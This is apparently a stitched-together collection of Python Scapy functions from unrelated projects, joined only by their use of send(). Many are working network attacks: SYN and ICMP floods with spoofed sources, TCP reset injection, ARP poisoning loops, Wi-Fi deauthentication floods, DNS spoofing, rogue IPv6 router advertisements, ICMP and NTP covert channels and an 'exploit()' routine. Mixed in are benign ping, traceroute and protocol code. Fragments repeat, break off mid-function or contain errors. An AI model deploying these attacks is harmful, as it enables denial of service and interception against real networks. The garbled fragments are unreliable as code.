def _send_reset(self, packet: Packet) -> None:
source_ip = packet[IP].src
source_port = packet[TCP].sport
destination_ip = packet[IP].dst
destination_port = packet[TCP].dport
sequence_number = packet[TCP].seq
acknowledge_number = packet[TCP].ack
flags = packet[TCP].flags
message = self._make_message(source_ip, source_port, destination_ip,
destination_port, sequence_number,
acknowledge_number, flags)
logger.info(f'Captured message \n ------ \n {message} \n ------ ')
if 'S' in flags:
logger.warning('Packet has SYN flag, not sending RST')
return
jitter = random.randint(max(-self.sequence_jitter, -sequence_number),
self.sequence_jitter)
if jitter == 0:
logger.info('This RST packet should close connection')
reset_attack_sequence_number = acknowledge_number + jitter
reset_packet = IP(src=destination_ip, dst=source_ip) / TCP(
sport=destination_port,
dport=source_port,
flags='R',
window=self.DefaultWindowSize,
seq=reset_attack_sequence_number)
send(reset_packet, verbose=0, iface=self.interface)
def send_probe_req(self, bssid, essid):
"""Send a probe request to the specified AP"""
src = RandMAC() if self.mac is None else self.mac
self.logger.info('[!] Sending Broadcast Probe Request: SRC=[%s] -> BSSID: %s ESSID: %s' % (src, bssid, essid))
param = Dot11ProbeReq()
essid = Dot11Elt(ID='SSID', info=essid)
rates = Dot11Elt(ID='Rates', info="\x03\x12\x96\x18\x24\x30\x48\x60")
dsset = Dot11Elt(ID='DSset', info='\x01')
pkt = RadioTap() / Dot11(type=0, subtype=4, addr1='ff:ff:ff:ff:ff:ff', addr2=src,
addr3='ff:ff:ff:ff:ff:ff') / param / essid / rates / dsset
try:
sendp(pkt, verbose=0)
except:
return
print ("Probing network '%s (%s)'\n" % (bssid, essid))
try:
# Build a probe request packet with a SSID and a WPS information element
dst = mac2str(bssid)
src = mac2str("ff:ff:ff:ff:ff:ff")
packet = Dot11(addr1=dst, addr2=src, addr3=dst) / Dot11ProbeReq()
packet = packet / Dot11Elt(ID=0, len=len(essid), info=essid) / Dot11Elt(ID=221, len=9,
info="%s\x10\x4a\x00\x01\x10" % self.wps_parser.WPS_ID)
# Send it!
send(packet, verbose=0)
# self.probedNets[bssid] = None
except Exception, e:
print 'Failure sending probe request to', essid, ':', e
def icmpv6_ra(ifname):
# 提取本地MAC
ll_mac = get_mac_address(ifname)
# -----------IPv6头部------------
# Next Header: 0x3A (ICMPv6)
# 原地址: Link Local address
# 目的地址: FF02::1(所有节点)
base = IPv6(src=mac_to_ipv6_linklocal(ll_mac), dst='ff02::1')
# ----------ICMPv6头部----------
# ICMPv6 Type: 134
# ICMPv6 Code: 0 (RA)
router_solicitation = ICMPv6ND_RA()
# ----Source Link-Layer Address----
# 源地址: 路由器MAC地址,本次为欺骗,所以MAC地址是本地MAC地址
src_ll_addr = ICMPv6NDOptSrcLLAddr(lladdr=ll_mac)
# 提供MTU
mtu = ICMPv6NDOptMTU(mtu=1500)
# 提供前缀
prefix = ICMPv6NDOptPrefixInfo(prefix='2001:2::', prefixlen=64)
# 构建数据包
packet = base / router_solicitation / src_ll_addr / mtu / prefix
# packet.show()
# 一直发送,知道客户使用Ctrl + C终止
while True:
try:
time.sleep(1)
send(packet, verbose=False)
print('发送RA数据包')
except KeyboardInterrupt:
print('退出!')
def tcp_monitor_callback(pkt):
global SEQ_NUM
global TCPPORT
global HOSTADDR
global COUNT
if(pkt.payload.payload.flags & 2 != 0):
'A syn + ack situation, for SYN + ACK'
print("tcp incoming connection")
ACK=TCP(sport=pkt[TCP].dport, dport=pkt[TCP].sport, flags="A",ack=pkt[TCP].seq + 1,seq=pkt[TCP].ack)/get
send(IP(src=pkt.payload.dst,dst=pkt.payload.src)/ACK)
elif(pkt.payload.payload.flags & 8 !=0):
'accept push from server, 8 for PSH flag'
print("tcp push connection from server")
pushLen = pkt[IP].len - (pkt[IP].ihl * 4 + pkt[TCP].dataofs * 4)
ACK1win0=TCP(sport=pkt[TCP].dport, dport=pkt[TCP].sport, flags="A", ack=pkt[TCP].seq + pushLen - 1,seq=pkt[TCP].ack,window=0)
send(IP(src=pkt[IP].dst,dst=pkt[IP].src)/ACK1win0)
ACK2win0=TCP(sport=pkt[TCP].dport, dport=pkt[TCP].sport, flags="A", ack=pkt[TCP].seq + pushLen,seq=pkt[TCP].ack,window=0)
send(IP(src=pkt[IP].dst,dst=pkt[IP].src)/ACK2win0)
sleep(0.01)
ACKwin14600=TCP(sport=pkt[TCP].dport, dport=pkt[TCP].sport, flags="A", ack=pkt[TCP].seq + pushLen,seq=pkt[TCP].ack,window=14600)
send(IP(src=pkt[IP].dst,dst=pkt[IP].src)/ACKwin14600)
elif(pkt.payload.payload.flags & 1 !=0):
'accept fin from server'
print ("tcp server fin connection")
FIN=TCP(sport=pkt[TCP].dport, dport=pkt[TCP].sport, flags="FA", ack=pkt[TCP].seq +1, seq = pkt[TCP].ack)
send(IP(src=pkt[IP].dst,dst=pkt[IP].src)/FIN)
def __send_unencrypted_ack(self):
chlo = ACKPacket()
conf.L3socket = L3RawSocket
chlo.setfieldval(
'CID',
string_to_ascii(SessionInstance.get_instance().connection_id))
chlo.setfieldval(
"Packet Number",
PacketNumberInstance.get_instance().get_next_packet_number())
# print("First Ack Packet Number {}".format(int(str(PacketNumberInstance.get_instance().highest_received_packet_number), 16)))
chlo.setfieldval(
'Largest Acked',
int(
str(PacketNumberInstance.get_instance().
highest_received_packet_number), 16))
chlo.setfieldval(
'First Ack Block Length',
int(
str(PacketNumberInstance.get_instance().
highest_received_packet_number), 16))
associated_data = extract_from_packet(chlo, end=15)
body = extract_from_packet(chlo, start=27)
message_authentication_hash = FNV128A().generate_hash(
associated_data, body, True)
chlo.setfieldval('Message Authentication Hash',
string_to_ascii(message_authentication_hash))
p = IP(dst=SessionInstance.get_instance().destination_ip) / UDP(
dport=6121, sport=61250) / chlo
send(p)
def scapy_ping(self, ip: str) -> None:
"""
This function pings a host with Scapy.
"""
debug(f"Send ICMP packet for {ip!r}")
send(IP(dst=ip, src=self.ip) / ICMP(), iface=self.iface, verbose=False)
def _dns_responder(self, pkt: IP):
packet = Packet(pkt, self.domain)
answer = None
request_name = dnstypes[packet.question.qtype]
if self.config["server"]["log"] == "*" or \
self.config["server"]["log"] == request_name:
self.logger.info(
"[DNS %s] Source %s:%i - on %s",
request_name,
packet.src,
packet.sport,
packet.qname,
)
# reject every packet which isn't a DNS A/TXT query
if packet.is_valid_dnsquery(
"A", self.config["server"]["root"] if self.config else ""):
answer = self._make_a(packet)
elif packet.is_valid_dnsquery("TXT"):
answer = self._make_txt(packet)
if answer is not None:
send(answer.packet, verbose=0, iface=self.interface)
def kill(self):
self.killed = True
# The sniff function will only terminate once it receives a packet, so send a meaningless packet to ensure it
# terminates immediately.
pkt = IP(dst=self.interface.get_active_hosts()[0].get_addr())
send(pkt, iface=self.interface.get_name(), verbose=False)
def listener(self, packet):
ip = packet.getlayer(IP)
udp = packet.getlayer(UDP)
if hasattr(packet, 'qd') and packet.qd is not None:
host = packet.qd.qname[:-1].decode("utf-8")
if host is not None:
if host in self.__dictDomains:
resolvedIP = self.__dictDomains[host]
print("[*] Spoofing DNS request. Now %s ip are %s !!!!" %
(host, resolvedIP))
else:
try:
resolvedIP = socket.gethostbyname(host)
except:
try:
resolvedIP = dns.resolver.resolve(host, 'A')
except:
resolvedIP = None
# DNS response
if resolvedIP is not None:
#print("Resolved DNS request for %s to %s for %s" % (host, resolvedIP, ip.src))
send(self.generatePacket(packet, host, resolvedIP, ip,
udp))
else:
return
def udp_monitor_callback(pkt):
inLayer3 = pkt.payload.payload.payload.payload.payload
if (pkt.haslayer(IP) and inLayer3.dst == INNERIP):
print("incoming IP packet matches", INNERIP)
outLayer3 = pkt.payload
udpLayer = pkt.payload.payload
vxlanLayer = pkt.payload.payload.payload
inLayer2 = pkt.payload.payload.payload.payload
inLayer4 = pkt.payload.payload.payload.payload.payload.payload
outerIP = IP(src=outLayer3.dst, dst=outLayer3.src)
udpinfo = UDP(sport=SRCPORT, dport=UDPPORT)
vxlan = VXLAN(flags=vxlanLayer.flags, vni=VNI)
innerETH = Ether(dst=inLayer2.src, src=inLayer2.dst, type=0x800)
innerIP = IP(src=inLayer3.dst, dst=inLayer3.src)
innerICMP = ICMP(type=0, code=0, id=inLayer4.id, seq=inLayer4.seq)
send(outerIP / udpinfo / vxlan / innerETH / innerIP / innerICMP /
PAYLOAD)
if (pkt.haslayer(ARP)):
print("incoming ARP packet")
def main():
"""
:return: void
"""
got_data = 0
ip_layer = IP(src=TUNNEL_SERVER_IP, dst=TUNNEL_CLIENT_IP)
while True:
print "==============================================================="
pkt = sniff(filter="icmp", timeout=15, count=1)
print "received packet ------------------------------------------"
pkt[0].show()
print "received packet ------------------------------------------"
i = 0
tunneled_data = pkt[0][ICMP].load
if tunneled_data[:9] == "#request:":
i = pkt[0][ICMP].seq
tunneled_data = "#answer: " + random_word() + str(i)
got_data = 1
if got_data == 0:
tunneled_data = "Couldn't get data"
icmp = (ICMP(type=0, code=0, id=pkt[0][ICMP].id, seq=i,
chksum=random.randrange(1, 65535, 1)) / tunneled_data)
packet = ip_layer / icmp
print "sent packet ------------------------------------------"
packet.show()
print "sent packet ------------------------------------------"
send(packet)
got_data = 0
def start_transmission(self, count):
self.__sniffer.start()
time.sleep(1)
try:
while count != 0:
count -= 1
pkt = self.__generate_next_packet()
pkt_sent_time = time.time()
send(pkt, verbose=False)
if time.time() - pkt_sent_time < 1:
time.sleep(TIME_INTERVAL - time.time() + pkt_sent_time)
if self.__last_received_sequence_number != self.__last_generated_sequence_number:
print(
f'<{self.__last_generated_sequence_number}, "Timed_Out">'
)
self.__last_received_sequence_number += 1
except KeyboardInterrupt:
print('\nPacket Transmission Terminated!')
self.__sniffer.stop()
packet_loss = round(
((self.__last_generated_sequence_number + 1 -
self.__received_count) /
(self.__last_generated_sequence_number + 1)) * 100, 2)
print(
f'Packet Loss: {packet_loss}% \t | Packets Sent : {self.__last_generated_sequence_number + 1} \t | Packets Received : {self.__received_count}'
)
def sendACK(self, **kwargs): # {{{
"""
send a ACK to the defined host
"""
self.info(msg='Send ACK to %s' % kwargs['host'], **kwargs)
rq = self.ipRequest(**kwargs)/self.tcpRequest(flags="A", **kwargs)
send(str(rq), verbose=0)
def spam_pings(self, timeout=100):
'''The spammer function that sends the generated packets'''
start_time = time.time()
while time.time() - start_time < timeout:
pkt = self.__generate_packet()
print(pkt.summary())
send(pkt, verbose=False)
def ARPpoison(dstIP, interval=7):
try:
# Default gateway IP and MAC
gwIP = CmnNet.getDefaultGatewayIP()
gwMAC = CmnNet.getMACByIP(gwIP)
# Local IP and MAC
lclIP = CmnNet.getLocalDefaultIP()
lclMAC = CmnNet.getLocalDefaultMAC()
# Target IP and MAC
if not CmnNet.isValidIP(dstIP):
raise InvalidIPv4Exception(dstIP)
dstMAC = CmnNet.getMACByIP(dstIP)
arpA = ARP(op=2, psrc=dstIP, hwsrc=lclMAC, pdst=gwIP, hwdst=gwMac)
arpB = ARP(op=2, psrc=gwIP, hwsrc=lclMAC, pdst=dstIP, hwdst=dstMac)
except e:
raise e
while True:
try:
send(arpA, iface=programMgr.mainNICName)
send(arpB, iface=programMgr.mainNICName)
except KeyboardInterrupt:
exit(0)
except:
raise NetworkException()
time.sleep(interval)
def restore(target_ip, host_ip, verbose=True):
target_mac = get_mac(target_ip)
host_mac = get_mac(host_ip)
pkt = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, hwsrc=host_mac)
send(pkt, verbose=0, count=100)
if verbose:
print('[+] sent to {} : {} is-at {}'.format(target_ip, host_ip, host_mac))
def send_echo_multiprocess(addr, data, index, str_f, seq=0):
"""Send echo request and sniff the reply.
Arguments:
addr {str} -- target address
data {str} -- payload
index {int} -- number of currently handling IP prefix
str_f {list(str)} -- a list to store log strings
Keyword Arguments:
seq {int} -- sequence number in the ping request (default: {0})
Returns:
list -- list of packets received
"""
str_f.append('--> Sending Echo Request to IP #%d, Seq = %d' % (index, seq))
base = IPv6(dst=addr, plen=len(data) + 8)
extension = ICMPv6EchoRequest(data=data, seq=seq)
packet = base / extension
send(packet, verbose=False)
rcv = sniff(timeout=0.5, filter='src %s' % addr)
res = []
for i in rcv:
res.append(i.show(dump=True))
return res
def SYN_Flood(t_ip, t_port):
print("Пакеты отправляются")
global stop_thread
stop_thread = True
while stop_thread:
global packets
ip_p = IP()
ip_p.src = randomIP() # записываем в поле ip источника случайный ip
#ip_p.src = "8.8.8.8"
ip_p.dst = t_ip # записываем ip сервера
tcp_p = TCP()
#tcp_p.sport = 234
tcp_p.sport = randint(
0, 6000) # записываем в поле port источника случайный port
tcp_p.dport = t_port # записываем port сервер
tcp_p.flags = "S" # устанавливаем флаг SYN
tcp_p.seq = randint(0,
9000) # устанавливаем случайный порядковый номер ?
tcp_p.window = randint(5000, 8191) # устанавливаем случайное окно ?
send(ip_p / tcp_p, verbose=False) # отправляем пакет
packets += 1
myapp.ui.packetsCount.setText(str(packets))
# print("Пакет {0} отправлен".format(i + 1))
packets = 0
myapp.ui.packetsCount.setText(str(packets))
def send_next_pck(self, ip_address, ntp_mode: NTPMode = NTPMode.CLIENT) -> Packet:
"""
Sends the next chunk of payload bits to the destination.
:param ip_address:
:param ntp_mode: the mode of the ntp package to send.
:return: the bits just send.
"""
next_bits_to_send = self.send_session.secret_to_send.next_bits(self.payload_size)
self.log.debug("Next payload bits to send: " + str(next_bits_to_send))
ntp_pck = CP1Package(ntp_pck=init_ntp_client_pck())
ntp_pck.add_payload(next_bits_to_send)
ntp_pck_ntp = ntp_pck.ntp()
ntp_pck_ntp.orig = None
ntp_pck_ntp.recv = None
ntp_pck_ntp.mode = 5
pck_to_send = IP(dst=ip_address) / UDP() / ntp_pck_ntp
send(pck_to_send)
self.log.debug("Payload package successfully send to " + str(ip_address))
if not self.send_session.secret_to_send.has_next_bits():
self.log.debug("Sending complete. Terminating sending session.")
return pck_to_send
def get_data(pkt: IP):
try:
client_message = pkt[DNSQR].qname[:-1].decode('utf-8')
add_new_client = False
for client in clients:
if client.receiver_socket[
1] == -1 and client.sender_socket == address:
add_new_client = True
client.receiver_socket = (client.receiver_socket[0],
int(client_message))
if not add_new_client:
print(
time.ctime(time.time()) + str(address) + " => " +
str(client_message))
for client in clients:
if client.sender_socket != address:
try:
if client.receiver_socket[1] != -1:
p = IP(dst=client.receiver_socket[0]) / UDP(dport=client.receiver_socket[1]) \
/ DNS(rd=1, qd=DNSQR(qname=client_message))
print(client.receiver_socket[1])
send(p, verbose=0)
print("Message was sent to", client)
except socket.error as err:
print(err)
except socket.error as err:
print(err)
clients_to_remove.append(address)
def tcp(self):
ip = IP(dst=target)
tcp = TCP(sport=RandShort(), dport=port, flags="S")
raw = Raw(b"X" * 1024)
p = ip / tcp / raw
send(p, verbose=1, count=count)
print('Done')
prompt()
def http(self):
ip = IP(dst=target)
tcp = TCP(sport=RandShort(), dport=port, flags="A")
get = "GET / HTTP/1.1\r\nHost: " + target
p = ip / tcp / get
send(p, verbose=1, count=count)
print('Done')
prompt()
def is_able_to_send_ip():
try:
p = IP(dst='8.8.8.8')
send(p, verbose=0)
except PermissionError:
return False
return True
def synFlood(m_host, m_port):
src_host = ['192.168.1.2', '129.12.12.132', '192.168.1.26']
index = random.randrange(0, stop=2)
for port in range(1024, 65535):
ip = IP(src=src_host[index], dst=m_host)
tcp = TCP(sport=port, dport=m_port, flags="S")
pkt = ip / tcp
send(pkt)
def bcast_icmp(iface):
"""
Send broadcast IP4 ping
"""
global iface_bcast_addr
if iface_bcast_addr is None:
iface_bcast_addr = get_brdaddr(iface)
send(IP(dst=iface_bcast_addr) / ICMP() / "whosthere")
def SEND(self):
"""Main state of sender.
New packets are transmitted to the receiver as long as there is space
in the window.
"""
if (self.retransmit_flag):
self.retransmit_flag = False
raise self.RETRANSMIT()
# check if you still can send new packets to the receiver
if len(self.buffer) < self.effective_window:
try:
# get next payload (automatically removes it from queue)
payload = self.q.get(block=False)
log.debug("Sending packet num: %s", self.current)
# add the current segment to the buffer
self.buffer[self.current] = payload
log.debug("Current buffer size: %s. Current buffer keys: %s",
len(self.buffer), list(self.buffer.keys()))
###############################################################
# create a GBN header with the correct header field values #
# send a packet to the receiver containing the created header #
# and the corresponding payload #
###############################################################
if (self.SACK == 0):
header_GBN = GBN(type='data',
len=len(payload),
hlen=6,
num=self.current,
win=self.win)
if (self.SACK == 1):
header_GBN = GBN(type='data',
options=1,
len=len(payload),
hlen=6,
num=self.current,
win=self.win)
send(
IP(src=self.sender, dst=self.receiver) / header_GBN /
payload)
# sequence number of next packet
self.current = int((self.current + 1) % 2**self.n_bits)
# back to the beginning of the state
# (send next packet if possible)
raise self.SEND()
# no more payload pieces in the queue --> if all are acknowledged,
# we can end the sender
except que.Empty:
if self.unack == self.current:
raise self.END()
def run(self):
while True:
if self.flag:
raise Exception('Stop sending deauth packet')
for ap in self.AP_list:
address = ap[0]
deauth_ap = Dot11(addr1=self.client, addr2=address, addr3=address)/Dot11Deauth()
print ls(deauth_ap)
send(deauth_ap, inter=0, count=1)
def version_covert_channel(src: str, dst: str, numpackets=2):
ip = IPv6()
ip.version = 5
ip.src = src
ip.dst = dst
layer4 = ICMPv6EchoRequest()
pkt = ip / layer4
pkt.show()
send(pkt, count=numpackets)
def spoof_arp_cache(targetip, targetmac, sourceip):
"""
Spoofs ARP Cache of the target device
@param targetip: IP address of target machine
@param targetmac: MAC address of the target machine
@param sourceip: IP address of source host
"""
spoofed = ARP(op=2, pdst=targetip, psrc=sourceip, hwdst=targetmac)
send(spoofed, verbose=False)
def quick_confirm(self):
filt = "icmp and dst host " + self.victim.get_addr()
self.quick_confirm_bool = False
send(self.ping_pkt, verbose=False)
sniff(count=1, filter=filt, timeout=1, prn=self.set_confirm_bool(True))
self.success = self.quick_confirm_bool
def arp_poison(gateway_ip, gateway_mac, target_ip, target_mac, stop):
""" invia false ARP reply """
print(" Started ARP poison [CTRL-C to stop]")
while not stop.is_set():
# avvelena il target
send(ARP(op=2, hwdst=gateway_mac, pdst=gateway_ip, psrc=target_ip))
# avvelena il gateway
send(ARP(op=2, hwdst=target_mac, pdst=target_ip, psrc=gateway_ip))
stop.wait(random.randrange(10, 40))
print(" Stopped ARP poison")
def run(self):
while True:
if self.flag:
raise Exception('Stop sending deauth packet')
for ap in self.AP_list:
address = ap[0]
deauth_ap = Dot11(addr1=self.client,
addr2=address,
addr3=address) / Dot11Deauth()
print ls(deauth_ap)
send(deauth_ap, inter=0, count=1)
def icmp_flood(self):
print('\n' + ' ' * 23 + 'ICMP Flooding on %s\n' % self.args.target_ip)
t = threading.Thread(target=self.show_stats, daemon=True)
t.start()
packet = scapy.layers.inet.IP(
dst=self.args.target_ip) / scapy.layers.inet.ICMP()
packet_bytes = len(packet)
while True:
send(packet, verbose=False)
self.packets = self.packets + 1
self.bytes = self.bytes + packet_bytes
def send_packet(self, ttl):
unused_port = self.get_unused_port()
with self.ttl_to_ports_lock:
self.ttl_to_ports[ttl].append(unused_port)
layer = self.create_payload(unused_port, self.dst_port)
p = self.ip_fabric(self.dst_ip, ttl) / layer
self.port_to_ttl_and_time[unused_port] = (ttl, time.time())
send(p, verbose=0)
def send_pkt(i, id_icmp):
"""
:param i: index of message
:param id_icmp: if of icmp message
:return: void
"""
tunneled_data = REQUEST + MSG + random_word()
# fake checksum so that os will throw the packet on other side
checksum = random.randrange(1, 65535, 1)
# src address is known by server
ip_layer = IP(src=TUNNEL_CLIENT_IP, dst=TUNNEL_SERVER_IP,
chksum=checksum)
icmp = (ICMP(type=8, code=0, seq=i, id=id_icmp) / tunneled_data)
packet = ip_layer / icmp
print "sent packet: "
packet.show()
send(packet)
def send_reset(original_packet):
"""
sends a reset message to both parties of a connection
:param original_packet: the packet that the reset replies to
:return: None
"""
dst_port = original_packet['TCP'].dport
src_port = original_packet['TCP'].sport
src_ip = original_packet['IP'].src
dst_ip = original_packet['IP'].dst
send(IP(src=dst_ip, dst=src_ip) / TCP(sport=dst_port, dport=src_port,
flags=RST_FLAG,
seq=original_packet['TCP'].ack),
verbose=False)
send(IP(src=src_ip, dst=dst_ip) / TCP(sport=src_port, dport=dst_port,
flags=RST_FLAG,
seq=original_packet['TCP'].seq),
verbose=False)
def exploit():
"""
Establish an HTTP conenction and send a malicious HTTP request.
"""
os.system('iptables -A OUTPUT -p tcp --tcp-flags RST RST -s 172.16.1.1 -j DROP')
src_port = random.randint(1024, 65535)
ip_pkt = IP(src=src_ip, dst=dst_ip)
tcp_pkt = TCP(dport=8080, sport=src_port, \
seq=random.randint(0, 100000), flags='S')
syn_ack = sr1(ip_pkt / tcp_pkt)
tcp_pkt = TCP(dport=8080, sport=src_port, \
seq=syn_ack[TCP].ack, ack=(syn_ack[TCP].seq + 1), flags='A')
send(ip_pkt / tcp_pkt)
http_msg = "GET /file.exe HTTP/1.1\r\nContent-Length: " \
+ str(len(msg)) + "\r\n\r\n" + msg
sr1(ip_pkt / tcp_pkt / http_msg, timeout=30)
exit()
def handle_packet(pkt):
"""
Apply packet handling logic.
:param pkt: Received packet from network.
"""
global id_counter
scapy_packet = IP(pkt.get_payload())
if IP in scapy_packet:
scapy_packet[IP].ttl = get_new_ttl(scapy_packet[IP].ttl)
scapy_packet[IP].id = id_counter
# Change IP ID as Virtual NAT on Windows Host would do.
id_counter += 1
if TCP in scapy_packet and scapy_packet[TCP].flags & RST:
scapy_packet[TCP].flags = 'FA'
del scapy_packet[IP].chksum
send(scapy_packet)
print 'Drop Packet'
pkt.drop()
else:
print 'Accept Packet'
pkt.accept()
def run(self):
while True:
if self.flag:
raise Exception('Stop sending deauth packet')
for ap in self.AP_list:
address = ap[0]
deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=address, addr3=address)/Dot11Deauth()
send(deauth_ap, inter=0, count=5)
print ls(deauth_ap)
if len(self.clients_APs) > 0:
with self.lock:
for x in self.clients_APs:
client = x[0]
ap = x[1]
ch = x[2]
deauth_pkt1 = Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth()
deauth_pkt2 = Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth()
send(deauth_pkt1, inter=0, count=1)
send(deauth_pkt2, inter=0, count=1)
def send(self, p, dest_iface=None):
send(p.data, iface = self.ifname)
ACKwin14600=TCP(sport=pkt[TCP].dport, dport=pkt[TCP].sport, flags="A", ack=pkt[TCP].seq + pushLen,seq=pkt[TCP].ack,window=14600)
send(IP(src=pkt[IP].dst,dst=pkt[IP].src)/ACKwin14600)
elif(pkt.payload.payload.flags & 1 !=0):
'accept fin from server'
print ("tcp server fin connection")
FIN=TCP(sport=pkt[TCP].dport, dport=pkt[TCP].sport, flags="FA", ack=pkt[TCP].seq +1, seq = pkt[TCP].ack)
send(IP(src=pkt[IP].dst,dst=pkt[IP].src)/FIN)
def dispatcher_callback(pkt):
print "packet incoming"
global HOSTADDR
global TCPPORT
if(pkt.haslayer(TCP) and (pkt[TCP].sport == TCPPORT)):
tcp_monitor_callback(pkt)
else:
return
if __name__ == '__main__':
print "Simple scapy http client "
scapy.all.conf.iface = "eth0"
ip=IP(dst=HOSTADDR)
SYN=ip/TCP(sport=SRCPORT, dport=80, flags="S", options=[('Timestamp',(0,0))])
#SYN=ip/TCP(sport=12340, dport=80, flags="S")
# Send SYN and receive SYN,ACK
print "\n[*] Sending our SYN packet"
send(SYN)
sniff(filter=("port %s") % (TCPPORT), prn=dispatcher_callback)
def tcp_monitor_callback(pkt):
global SEQ_NUM
global TCPPORT
if(pkt.payload.payload.flags == 2):
'A syn situation, 2 for SYN'
print("tcp incoming connection")
ACK=TCP(sport=TCPPORT, dport=pkt.payload.payload.sport, flags="SA",ack=pkt.payload.payload.seq + 1,seq=0)
send(IP(src=pkt.payload.dst,dst=pkt.payload.src)/ACK)
if(pkt.payload.payload.flags & 8 !=0):
'accept push from client, 8 for PSH flag'
print("tcp push connection")
pushLen = pkt[IP].len - (pkt[IP].ihl * 4 + pkt[TCP].dataofs * 4)
fr8=TCP(sport=TCPPORT, dport=pkt[TCP].sport, flags="PA", ack=pkt[TCP].seq + pushLen,seq=pkt[TCP].ack)/get8
fr10=TCP(sport=TCPPORT, dport=pkt[TCP].sport, flags="PA", ack=pkt[TCP].seq + pushLen,seq=pkt[TCP].ack + len(get8))/get10
fr11=TCP(sport=TCPPORT, dport=pkt[TCP].sport, flags="PA", ack=pkt[TCP].seq + pushLen,seq=pkt[TCP].ack + len(get8) + len(get10))/get11
fr13=TCP(sport=TCPPORT, dport=pkt[TCP].sport, flags="PA", ack=pkt[TCP].seq + pushLen,seq=pkt[TCP].ack + len(get8) + len(get10) + len(get11))/get13
send(IP(src=pkt.payload.dst,dst=pkt.payload.src)/fr8)
send(IP(src=pkt.payload.dst,dst=pkt.payload.src)/fr10)
send(IP(src=pkt.payload.dst,dst=pkt.payload.src)/fr11)
send(IP(src=pkt.payload.dst,dst=pkt.payload.src)/fr13)
if(pkt.payload.payload.flags & 1 !=0):
'accept fin from cilent'
print ("tcp fin connection")
FIN=TCP(sport=TCPPORT, dport=pkt.payload.payload.sport, flags="FA", ack=pkt.payload.payload.seq +1, seq = pkt.payload.payload.ack)
send(IP(src=pkt.payload.dst,dst=pkt.payload.src)/FIN)
from scapy.layers.dot11 import Dot11, Dot11Deauth
from scapy.packet import ls
from scapy.sendrecv import send
__author__ = 'daniel'
deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2='00:66:4b:78:db:cc', addr3='00:66:4b:78:db:cc')/Dot11Deauth()
while True:
ls(deauth_ap)
send(deauth_ap, inter=0, count=1)
def handle_packet(pkt):
"""
Apply packet handling logic.
:param pkt: Received packet from network.
"""
scapy_packet = IP(pkt.get_payload())
src_ip = scapy_packet[IP].src
# Check if ICMP request packet
if (ICMP in scapy_packet and
scapy_packet[ICMP].type == 8 and
Raw in scapy_packet):
# If new malware register it.
if src_ip not in malwares:
client_os = get_client_os_from_icmp_payload(scapy_packet)
malwares[src_ip] = MalwareClient(src_ip,
client_os,
scapy_packet[IP].id,
False)
mal = malwares[src_ip]
# Check if this is second ping
if mal.is_seen_ping:
# Check if malware runs inside VM by two pings IP IDs.
if mal.is_vm_by_ip_id(scapy_packet[IP].id):
response = "True"
else:
response = "False"
# Update last received IP ID.
mal.set_ip_id(scapy_packet[IP].id)
mal.set_is_seen_ping(False)
# Return answer to the malware.
cmd = (IP(dst=scapy_packet[IP].src) /
ICMP(type=0,
code=0,
id=scapy_packet[ICMP].id,
seq=scapy_packet[ICMP].seq) / response)
send(cmd)
print 'Drop'
pkt.drop()
else:
# Update last received IP ID.
mal.set_ip_id(scapy_packet[IP].id)
mal.set_is_seen_ping(True)
# Drop first ping
print 'Drop'
pkt.drop()
# Check if TCP SYN packet
elif (TCP in scapy_packet and scapy_packet[TCP].flags & SYN and
scapy_packet[TCP].dport == 80):
next_ack = scapy_packet.seq + 1
init_seq = randint(0, 4294967295)
syn_ack = IP(src=scapy_packet.dst,
dst=scapy_packet.src)
syn_ack /= TCP(sport=scapy_packet.dport,
dport=scapy_packet.sport,
flags="SA", seq=init_seq, ack=next_ack)
send(syn_ack)
print "Received SYN, answered with SYN/ACK"
pkt.drop()
# Check if HTTP GET Request.
elif http_filter(scapy_packet):
# If new malware register it.
if src_ip not in malwares:
user_agent = get_user_agent(scapy_packet[Raw].load)
client_os = get_os_from_user_agent(user_agent)
print client_os
malwares[src_ip] = MalwareClient(src_ip,
client_os,
scapy_packet[IP].id,
False)
mal = malwares[src_ip]
# Check if malware runs inside VM by packet TTL.
if mal.is_vm_by_ttl(scapy_packet[IP].ttl):
response = "True"
else:
response = "False"
# Return an answer with FA packet.
next_seq = scapy_packet[TCP].ack
next_ack = calc_next_ack(scapy_packet)
res_pkt = IP(src=scapy_packet.dst, dst=scapy_packet.src)
res_pkt /= TCP(sport=scapy_packet.dport, dport=scapy_packet.sport,
flags="FPA", seq=next_seq, ack=next_ack)
res_pkt /= 'HTTP/1.1 403 Forbidden\r\n' \
'Connection: close\r\n'\
'Content-Type: text/html;charset=iso-8859-1\r\n\r\n%s' \
% response
send(res_pkt)
pkt.drop()
else:
print 'Accept'
pkt.accept()
